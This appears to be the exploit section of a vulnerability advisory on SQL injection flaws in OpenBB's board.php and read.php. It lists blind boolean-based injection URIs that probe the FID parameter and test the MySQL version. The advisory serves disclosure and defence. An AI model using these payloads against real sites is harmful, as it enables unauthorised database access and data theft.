• info
• discussion
• exploit
• solution
• references

OpenBB Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/board.php?FID=3+and+1=1 >>> True
http://www.example.com/board.php?FID=3+and+1=2 >>> False
http://www.example.com/board.php?FID=3+and+substring(@@version,1,1)=5 >>> True
http://www.example.com/board.php?FID=3+and+substring(@@version,1,1)=4 >>> False
http://www.example.com/read.php?FID=3+and+1=1 >>> True
http://www.example.com/read.php?FID=3+and+1=2 >>> False
http://www.example.com/read.php?FID=3+and+substring(@@version,1,1)=5 >>> True
http://www.example.com/read.php?FID=3+and+substring(@@version,1,1)=4 >>> False